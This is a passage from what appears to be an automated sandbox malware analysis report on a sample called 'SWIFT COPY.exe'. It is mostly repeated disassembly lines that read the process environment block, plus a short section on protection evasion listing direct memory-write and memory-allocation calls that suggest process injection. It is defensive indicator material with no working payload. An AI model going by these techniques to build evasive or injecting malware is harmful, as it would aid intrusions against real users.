                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340770 mov eax, dword ptr fs:[00000030h]3_2_01340770
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01330750 mov eax, dword ptr fs:[00000030h]3_2_01330750
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BE75D mov eax, dword ptr fs:[00000030h]3_2_013BE75D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372750 mov eax, dword ptr fs:[00000030h]3_2_01372750
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372750 mov eax, dword ptr fs:[00000030h]3_2_01372750
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B4755 mov eax, dword ptr fs:[00000030h]3_2_013B4755
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136674D mov esi, dword ptr fs:[00000030h]3_2_0136674D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136674D mov eax, dword ptr fs:[00000030h]3_2_0136674D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136674D mov eax, dword ptr fs:[00000030h]3_2_0136674D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013307AF mov eax, dword ptr fs:[00000030h]3_2_013307AF
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E47A0 mov eax, dword ptr fs:[00000030h]3_2_013E47A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D678E mov eax, dword ptr fs:[00000030h]3_2_013D678E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013347FB mov eax, dword ptr fs:[00000030h]3_2_013347FB
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013347FB mov eax, dword ptr fs:[00000030h]3_2_013347FB
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013527ED mov eax, dword ptr fs:[00000030h]3_2_013527ED
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013527ED mov eax, dword ptr fs:[00000030h]3_2_013527ED
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013527ED mov eax, dword ptr fs:[00000030h]3_2_013527ED
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BE7E1 mov eax, dword ptr fs:[00000030h]3_2_013BE7E1
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133C7C0 mov eax, dword ptr fs:[00000030h]3_2_0133C7C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B07C3 mov eax, dword ptr fs:[00000030h]3_2_013B07C3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134E627 mov eax, dword ptr fs:[00000030h]3_2_0134E627
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01366620 mov eax, dword ptr fs:[00000030h]3_2_01366620
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01368620 mov eax, dword ptr fs:[00000030h]3_2_01368620
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133262C mov eax, dword ptr fs:[00000030h]3_2_0133262C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372619 mov eax, dword ptr fs:[00000030h]3_2_01372619
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AE609 mov eax, dword ptr fs:[00000030h]3_2_013AE609
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134260B mov eax, dword ptr fs:[00000030h]3_2_0134260B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134260B mov eax, dword ptr fs:[00000030h]3_2_0134260B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134260B mov eax, dword ptr fs:[00000030h]3_2_0134260B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134260B mov eax, dword ptr fs:[00000030h]3_2_0134260B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134260B mov eax, dword ptr fs:[00000030h]3_2_0134260B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134260B mov eax, dword ptr fs:[00000030h]3_2_0134260B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134260B mov eax, dword ptr fs:[00000030h]3_2_0134260B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01362674 mov eax, dword ptr fs:[00000030h]3_2_01362674
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F866E mov eax, dword ptr fs:[00000030h]3_2_013F866E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F866E mov eax, dword ptr fs:[00000030h]3_2_013F866E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136A660 mov eax, dword ptr fs:[00000030h]3_2_0136A660
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136A660 mov eax, dword ptr fs:[00000030h]3_2_0136A660
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0134C640 mov eax, dword ptr fs:[00000030h]3_2_0134C640
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013666B0 mov eax, dword ptr fs:[00000030h]3_2_013666B0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136C6A6 mov eax, dword ptr fs:[00000030h]3_2_0136C6A6
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01334690 mov eax, dword ptr fs:[00000030h]3_2_01334690
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01334690 mov eax, dword ptr fs:[00000030h]3_2_01334690
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AE6F2 mov eax, dword ptr fs:[00000030h]3_2_013AE6F2
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AE6F2 mov eax, dword ptr fs:[00000030h]3_2_013AE6F2
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AE6F2 mov eax, dword ptr fs:[00000030h]3_2_013AE6F2
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AE6F2 mov eax, dword ptr fs:[00000030h]3_2_013AE6F2
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B06F1 mov eax, dword ptr fs:[00000030h]3_2_013B06F1
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B06F1 mov eax, dword ptr fs:[00000030h]3_2_013B06F1
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0136A6C7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136A6C7 mov eax, dword ptr fs:[00000030h]3_2_0136A6C7
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01404940 mov eax, dword ptr fs:[00000030h]3_2_01404940
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B892A mov eax, dword ptr fs:[00000030h]3_2_013B892A
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C892B mov eax, dword ptr fs:[00000030h]3_2_013C892B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BC912 mov eax, dword ptr fs:[00000030h]3_2_013BC912
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01328918 mov eax, dword ptr fs:[00000030h]3_2_01328918
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01328918 mov eax, dword ptr fs:[00000030h]3_2_01328918
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AE908 mov eax, dword ptr fs:[00000030h]3_2_013AE908
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AE908 mov eax, dword ptr fs:[00000030h]3_2_013AE908
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D4978 mov eax, dword ptr fs:[00000030h]3_2_013D4978
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D4978 mov eax, dword ptr fs:[00000030h]3_2_013D4978
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BC97C mov eax, dword ptr fs:[00000030h]3_2_013BC97C
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01356962 mov eax, dword ptr fs:[00000030h]3_2_01356962
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01356962 mov eax, dword ptr fs:[00000030h]3_2_01356962
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01356962 mov eax, dword ptr fs:[00000030h]3_2_01356962
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0137096E mov eax, dword ptr fs:[00000030h]3_2_0137096E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0137096E mov edx, dword ptr fs:[00000030h]3_2_0137096E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0137096E mov eax, dword ptr fs:[00000030h]3_2_0137096E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B0946 mov eax, dword ptr fs:[00000030h]3_2_013B0946
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B89B3 mov esi, dword ptr fs:[00000030h]3_2_013B89B3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B89B3 mov eax, dword ptr fs:[00000030h]3_2_013B89B3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B89B3 mov eax, dword ptr fs:[00000030h]3_2_013B89B3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013309AD mov eax, dword ptr fs:[00000030h]3_2_013309AD
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013309AD mov eax, dword ptr fs:[00000030h]3_2_013309AD
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013629F9 mov eax, dword ptr fs:[00000030h]3_2_013629F9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013629F9 mov eax, dword ptr fs:[00000030h]3_2_013629F9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BE9E0 mov eax, dword ptr fs:[00000030h]3_2_013BE9E0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A9D0 mov eax, dword ptr fs:[00000030h]3_2_0133A9D0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A9D0 mov eax, dword ptr fs:[00000030h]3_2_0133A9D0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A9D0 mov eax, dword ptr fs:[00000030h]3_2_0133A9D0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A9D0 mov eax, dword ptr fs:[00000030h]3_2_0133A9D0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A9D0 mov eax, dword ptr fs:[00000030h]3_2_0133A9D0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133A9D0 mov eax, dword ptr fs:[00000030h]3_2_0133A9D0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013649D0 mov eax, dword ptr fs:[00000030h]3_2_013649D0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013FA9D3 mov eax, dword ptr fs:[00000030h]3_2_013FA9D3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C69C0 mov eax, dword ptr fs:[00000030h]3_2_013C69C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01352835 mov eax, dword ptr fs:[00000030h]3_2_01352835
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01352835 mov eax, dword ptr fs:[00000030h]3_2_01352835
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01352835 mov eax, dword ptr fs:[00000030h]3_2_01352835
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01352835 mov ecx, dword ptr fs:[00000030h]3_2_01352835
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01352835 mov eax, dword ptr fs:[00000030h]3_2_01352835
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01352835 mov eax, dword ptr fs:[00000030h]3_2_01352835
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136A830 mov eax, dword ptr fs:[00000030h]3_2_0136A830
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D483A mov eax, dword ptr fs:[00000030h]3_2_013D483A
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D483A mov eax, dword ptr fs:[00000030h]3_2_013D483A
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BC810 mov eax, dword ptr fs:[00000030h]3_2_013BC810
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BE872 mov eax, dword ptr fs:[00000030h]3_2_013BE872
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BE872 mov eax, dword ptr fs:[00000030h]3_2_013BE872
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C6870 mov eax, dword ptr fs:[00000030h]3_2_013C6870
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C6870 mov eax, dword ptr fs:[00000030h]3_2_013C6870
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01360854 mov eax, dword ptr fs:[00000030h]3_2_01360854
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01334859 mov eax, dword ptr fs:[00000030h]3_2_01334859
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01334859 mov eax, dword ptr fs:[00000030h]3_2_01334859
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01342840 mov ecx, dword ptr fs:[00000030h]3_2_01342840
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_014008C0 mov eax, dword ptr fs:[00000030h]3_2_014008C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BC89D mov eax, dword ptr fs:[00000030h]3_2_013BC89D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01330887 mov eax, dword ptr fs:[00000030h]3_2_01330887
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136C8F9 mov eax, dword ptr fs:[00000030h]3_2_0136C8F9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136C8F9 mov eax, dword ptr fs:[00000030h]3_2_0136C8F9
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013FA8E4 mov eax, dword ptr fs:[00000030h]3_2_013FA8E4
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135E8C0 mov eax, dword ptr fs:[00000030h]3_2_0135E8C0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135EB20 mov eax, dword ptr fs:[00000030h]3_2_0135EB20
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135EB20 mov eax, dword ptr fs:[00000030h]3_2_0135EB20
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F8B28 mov eax, dword ptr fs:[00000030h]3_2_013F8B28
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013F8B28 mov eax, dword ptr fs:[00000030h]3_2_013F8B28
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01402B57 mov eax, dword ptr fs:[00000030h]3_2_01402B57
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01402B57 mov eax, dword ptr fs:[00000030h]3_2_01402B57
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01402B57 mov eax, dword ptr fs:[00000030h]3_2_01402B57
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01402B57 mov eax, dword ptr fs:[00000030h]3_2_01402B57
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AEB1D mov eax, dword ptr fs:[00000030h]3_2_013AEB1D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AEB1D mov eax, dword ptr fs:[00000030h]3_2_013AEB1D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AEB1D mov eax, dword ptr fs:[00000030h]3_2_013AEB1D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AEB1D mov eax, dword ptr fs:[00000030h]3_2_013AEB1D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AEB1D mov eax, dword ptr fs:[00000030h]3_2_013AEB1D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AEB1D mov eax, dword ptr fs:[00000030h]3_2_013AEB1D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AEB1D mov eax, dword ptr fs:[00000030h]3_2_013AEB1D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AEB1D mov eax, dword ptr fs:[00000030h]3_2_013AEB1D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013AEB1D mov eax, dword ptr fs:[00000030h]3_2_013AEB1D
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01404B00 mov eax, dword ptr fs:[00000030h]3_2_01404B00
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0132CB7E mov eax, dword ptr fs:[00000030h]3_2_0132CB7E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01328B50 mov eax, dword ptr fs:[00000030h]3_2_01328B50
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DEB50 mov eax, dword ptr fs:[00000030h]3_2_013DEB50
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E4B4B mov eax, dword ptr fs:[00000030h]3_2_013E4B4B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E4B4B mov eax, dword ptr fs:[00000030h]3_2_013E4B4B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C6B40 mov eax, dword ptr fs:[00000030h]3_2_013C6B40
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013C6B40 mov eax, dword ptr fs:[00000030h]3_2_013C6B40
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013FAB40 mov eax, dword ptr fs:[00000030h]3_2_013FAB40
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013D8B42 mov eax, dword ptr fs:[00000030h]3_2_013D8B42
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340BBE mov eax, dword ptr fs:[00000030h]3_2_01340BBE
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340BBE mov eax, dword ptr fs:[00000030h]3_2_01340BBE
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E4BB0 mov eax, dword ptr fs:[00000030h]3_2_013E4BB0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013E4BB0 mov eax, dword ptr fs:[00000030h]3_2_013E4BB0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01338BF0 mov eax, dword ptr fs:[00000030h]3_2_01338BF0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01338BF0 mov eax, dword ptr fs:[00000030h]3_2_01338BF0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01338BF0 mov eax, dword ptr fs:[00000030h]3_2_01338BF0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135EBFC mov eax, dword ptr fs:[00000030h]3_2_0135EBFC
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BCBF0 mov eax, dword ptr fs:[00000030h]3_2_013BCBF0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DEBD0 mov eax, dword ptr fs:[00000030h]3_2_013DEBD0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01350BCB mov eax, dword ptr fs:[00000030h]3_2_01350BCB
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01350BCB mov eax, dword ptr fs:[00000030h]3_2_01350BCB
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01350BCB mov eax, dword ptr fs:[00000030h]3_2_01350BCB
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01330BCD mov eax, dword ptr fs:[00000030h]3_2_01330BCD
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01330BCD mov eax, dword ptr fs:[00000030h]3_2_01330BCD
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01330BCD mov eax, dword ptr fs:[00000030h]3_2_01330BCD
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01354A35 mov eax, dword ptr fs:[00000030h]3_2_01354A35
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01354A35 mov eax, dword ptr fs:[00000030h]3_2_01354A35
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136CA24 mov eax, dword ptr fs:[00000030h]3_2_0136CA24
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0135EA2E mov eax, dword ptr fs:[00000030h]3_2_0135EA2E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013BCA11 mov eax, dword ptr fs:[00000030h]3_2_013BCA11
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013ACA72 mov eax, dword ptr fs:[00000030h]3_2_013ACA72
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013ACA72 mov eax, dword ptr fs:[00000030h]3_2_013ACA72
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136CA6F mov eax, dword ptr fs:[00000030h]3_2_0136CA6F
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136CA6F mov eax, dword ptr fs:[00000030h]3_2_0136CA6F
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0136CA6F mov eax, dword ptr fs:[00000030h]3_2_0136CA6F
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013DEA60 mov eax, dword ptr fs:[00000030h]3_2_013DEA60
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01336A50 mov eax, dword ptr fs:[00000030h]3_2_01336A50
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01336A50 mov eax, dword ptr fs:[00000030h]3_2_01336A50
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01336A50 mov eax, dword ptr fs:[00000030h]3_2_01336A50
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01336A50 mov eax, dword ptr fs:[00000030h]3_2_01336A50
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01336A50 mov eax, dword ptr fs:[00000030h]3_2_01336A50
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01336A50 mov eax, dword ptr fs:[00000030h]3_2_01336A50
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01336A50 mov eax, dword ptr fs:[00000030h]3_2_01336A50
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340A5B mov eax, dword ptr fs:[00000030h]3_2_01340A5B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01340A5B mov eax, dword ptr fs:[00000030h]3_2_01340A5B
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01338AA0 mov eax, dword ptr fs:[00000030h]3_2_01338AA0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01338AA0 mov eax, dword ptr fs:[00000030h]3_2_01338AA0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01386AA4 mov eax, dword ptr fs:[00000030h]3_2_01386AA4
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01368A90 mov edx, dword ptr fs:[00000030h]3_2_01368A90
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133EA80 mov eax, dword ptr fs:[00000030h]3_2_0133EA80
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133EA80 mov eax, dword ptr fs:[00000030h]3_2_0133EA80
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133EA80 mov eax, dword ptr fs:[00000030h]3_2_0133EA80
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133EA80 mov eax, dword ptr fs:[00000030h]3_2_0133EA80
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133EA80 mov eax, dword ptr fs:[00000030h]3_2_0133EA80
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133EA80 mov eax, dword ptr fs:[00000030h]3_2_0133EA80
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133EA80 mov eax, dword ptr fs:[00000030h]3_2_0133EA80
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133EA80 mov eax, dword ptr fs:[00000030h]3_2_0133EA80
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0133EA80 mov eax, dword ptr fs:[00000030h]3_2_0133EA80
                Source: C:\Users\user\Desktop\SWIFT COPY.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
